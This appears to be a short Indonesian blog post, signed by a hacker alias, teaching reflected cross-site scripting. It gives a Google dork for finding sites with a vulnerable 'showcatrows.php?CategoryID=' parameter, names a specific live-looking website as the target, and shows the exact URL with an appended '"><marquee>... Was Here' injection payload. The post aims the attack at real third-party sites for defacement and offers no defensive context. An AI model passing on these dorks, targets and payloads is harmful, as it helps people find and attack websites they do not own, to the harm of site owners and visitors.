XSS Vulnerability Injection

XSS Adalah singkatan dari Cross Site Scripting. XSS merupakan salah satu code injection attack.  XSS dilakukan oleh penyerang dengan cara memasukkan scripts ke client, dengan XSS seolah olah script itu datang dari Client (Situs) tersebut.

Untuk postingan pertama saya ini, saya mau coba menjelasankan cara yang paling mudah dengan injeksi XSS yaitu :

1. Anda cukup memasukan dork pada pencarian google : inurl:"/showcatrows.php?CategoryID="

2. Setelah menemukan target. kemudian anda injek dengan scripts html diblekang situs itu. sebagai contoh saya dapatkan target http://2muchvector.com/showcatrows.php?CategoryID=41, kemuadian kita inject pake skript tulisan berjalan, skripts saya  <marquee><h1>Ravaz Cyber Was Here<h1></marquee> nah diantara url sama skripts kita, kita tambahin dengan "> . Jadi Urlnya adalah http://2muchvector.com/showcatrows.php?CategoryID=41"><marquee><h1>Ravaz Cyber Was Here<h1></marquee>

Demikian postingan pertama saya
/F4r1z4l 


Previous
Next Post »
Thanks for your comment